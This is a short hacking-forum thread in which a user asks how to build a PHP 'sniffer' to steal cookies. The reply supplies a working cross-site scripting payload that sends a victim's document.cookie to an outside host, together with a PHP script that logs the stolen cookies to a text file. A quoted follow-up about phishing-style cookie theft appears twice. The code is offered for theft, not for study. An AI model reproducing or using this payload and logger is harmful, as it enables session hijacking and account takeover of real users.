PHP sniffer 03-28-2013, 06:28 PM
#1
Is there way to create PHP sniffer to steal cookies ??
PHP sniffer filter_list | |
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
<?php
if(isset($_GET['cookie']))
{
$handler = fopen("cookies.txt","a");
fwrite($handler, $_GET['cookie']);
fclose($handler);
}
?>
(03-28-2013, 06:50 PM)fckN Wrote: Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookiesOh. As far as I know, thats not possible.
btw. thank you !
(03-28-2013, 06:50 PM)fckN Wrote: Ahhh i know for that, but i dont want this. I mean PHP sniffer like p h i s h i n g when you click on link to steal cookiesOh. As far as I know, thats not possible.
btw. thank you !